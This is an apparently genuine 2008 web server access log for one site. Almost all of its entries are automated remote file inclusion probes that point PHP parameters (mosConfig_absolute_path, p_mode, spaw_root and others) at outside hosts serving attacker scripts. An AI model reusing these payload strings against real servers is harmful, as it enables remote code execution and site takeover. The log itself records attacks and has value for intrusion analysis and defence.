208.122.47.166 - - [07/Aug/2008:12:00:55 -0700] "GET /logs//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:00:55 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:00:55 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.237.14 - - [07/Aug/2008:12:00:59 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:01:03 -0700] "GET /logs/access_080120.log//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:01:04 -0700] "GET /logs/access_080120.log/postscript.php?p_mode=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:01:11 -0700] "GET /logs/access_080120.log//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:12:01:28 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:12:01:28 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:01:30 -0700] "GET /logs/access_080120.log//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.84.19.133 - - [07/Aug/2008:12:01:31 -0700] "GET //////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 200 18437 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:01:44 -0700] "GET /logs/access.log/home.php?x=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:01:45 -0700] "GET /home.php?x=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:01:46 -0700] "GET /logs/home.php?x=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:02:10 -0700] "GET /logs/postscript.php?p_mode=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:02:10 -0700] "GET /postscript.php?p_mode=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:02:15 -0700] "GET /logs/access_080302.log/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:02:15 -0700] "GET /postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:02:15 -0700] "GET /logs/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:02:20 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:02:20 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:02:30 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:03:09 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:03:09 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:03:10 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:03:16 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:03:21 -0700] "GET /logs/access_080320.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:03:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:03:51 -0700] "GET /logs//postscript.php?p_mode=http://www.myboso.com/idv6seph.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:03:51 -0700] "GET /logs/access_080302.log//postscript.php?p_mode=http://www.myboso.com/idv6seph.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:03:51 -0700] "GET //postscript.php?p_mode=http://www.myboso.com/idv6seph.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:03:56 -0700] "GET /logs//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:03:56 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:04:13 -0700] "GET /logs/access_080120.log//postscript.php?p_mode=http://www.myboso.com/idv6seph.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:12:04:13 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:04:13 -0700] "GET /logs/access_080120.log/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:12:04:14 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:12:04:14 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:12:04:24 -0700] "GET /logs/access_080324.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.169.0.50 - - [07/Aug/2008:12:04:28 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
62.169.0.50 - - [07/Aug/2008:12:04:28 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
204.15.10.22 - - [07/Aug/2008:12:04:46 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
204.15.10.22 - - [07/Aug/2008:12:04:46 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:05:00 -0700] "GET /logs/access.log/forum.php?act=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:05:01 -0700] "GET /forum.php?act=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:05:01 -0700] "GET /logs/forum.php?act=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:05:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:12:05:21 -0700] "GET /logs/access_080119.log/errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:12:05:23 -0700] "GET /logs/access_080505.log/home.php?x=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:05:23 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:05:37 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:05:43 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:05:43 -0700] "GET /logs/access_080302.log/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:05:43 -0700] "GET /postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:05:44 -0700] "GET /logs/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:05:44 -0700] "GET /logs//login.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:05:49 -0700] "GET //login.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.228.12 - - [07/Aug/2008:12:05:50 -0700] "GET /vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
193.178.228.12 - - [07/Aug/2008:12:05:50 -0700] "GET /logs/vwar/includes/functions_install.php/modules/vwar/admin/admin.php?vwar_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:05:50 -0700] "GET /logs//login.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:05:51 -0700] "GET //login.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.248.82 - - [07/Aug/2008:12:05:57 -0700] "GET /logs/access_080320.log//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_%ADREQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.44.248.82 - - [07/Aug/2008:12:05:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_glossary&_%ADREQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.812" "www.dmulk.com"
207.44.248.82 - - [07/Aug/2008:12:05:58 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_%ADREQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.250.2.28 - - [07/Aug/2008:12:06:08 -0700] "GET /logs/access_080320.log//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_%ADREQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radioactivecrew.com/ec.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.250.2.28 - - [07/Aug/2008:12:06:09 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_glossary&_%ADREQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radioactivecrew.com/ec.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
213.250.2.28 - - [07/Aug/2008:12:06:09 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_%ADREQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radioactivecrew.com/ec.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:06:10 -0700] "GET /logs/access_080321.log//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:06:10 -0700] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:06:11 -0700] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:06:18 -0700] "GET /logs/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:06:19 -0700] "GET /postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.248.82 - - [07/Aug/2008:12:06:20 -0700] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_%ADREQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:06:25 -0700] "GET /logs//login.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:06:30 -0700] "GET //login.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:06:33 -0700] "GET /logs/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:06:33 -0700] "GET /postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:12:06:36 -0700] "GET /bikes/ HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:06:43 -0700] "GET /logs/access_080226.log//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:06:43 -0700] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 59573 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:06:48 -0700] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 18421 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.250.2.28 - - [07/Aug/2008:12:06:57 -0700] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_%ADREQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radioactivecrew.com/ec.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:12:07:00 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:07:02 -0700] "GET /logs/access_080302.log/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:07:11 -0700] "GET /logs/access_080120.log/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.70.145.159 - - [07/Aug/2008:12:07:20 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [07/Aug/2008:12:07:20 -0700] "GET /classes/core/language.php?rootdir=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [07/Aug/2008:12:07:20 -0700] "GET /logs/classes/core/language.php?rootdir=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.29.74.183 - - [07/Aug/2008:12:07:32 -0700] "GET //postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:07:38 -0700] "GET /logs/access_080302.log/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:07:43 -0700] "GET /logs/access_080122.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:12:07:43 -0700] "GET /bikes/ HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:07:44 -0700] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 18421 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:07:48 -0700] "GET /logs/access_080226.log//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.172.33.60 - - [07/Aug/2008:12:07:48 -0700] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 59573 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
72.29.74.183 - - [07/Aug/2008:12:08:03 -0700] "GET /logs//postscript.php?p_mode=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:12:08:35 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:08:37 -0700] "GET /logs/access_080120.log/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:08:53 -0700] "GET /logs/access_080329.log/lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:08:53 -0700] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:08:53 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:09:04 -0700] "GET /logs/access_080308.log/lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
151.11.24.250 - - [07/Aug/2008:12:09:06 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [07/Aug/2008:12:09:09 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:09:09 -0700] "GET /logs/access_080201.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [07/Aug/2008:12:09:11 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [07/Aug/2008:12:09:14 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:09:27 -0700] "GET /logs/access_080219.log//oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:09:28 -0700] "GET /logs/access_080219.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:12:09:28 -0700] "GET /logs/config.inc.php?_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:09:28 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:12:09:28 -0700] "GET /config.inc.php?_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:09:28 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:09:29 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:09:29 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
69.94.56.100 - - [07/Aug/2008:12:09:43 -0700] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:10:55 -0700] "GET /logs/access_080218.log//index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:10:57 -0700] "GET //index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:10:58 -0700] "GET /logs/access_080120.log/postscript.php?p_mode=http://www.ghareng.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:12:10:58 -0700] "GET /logs//index.php?id=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:11:14 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
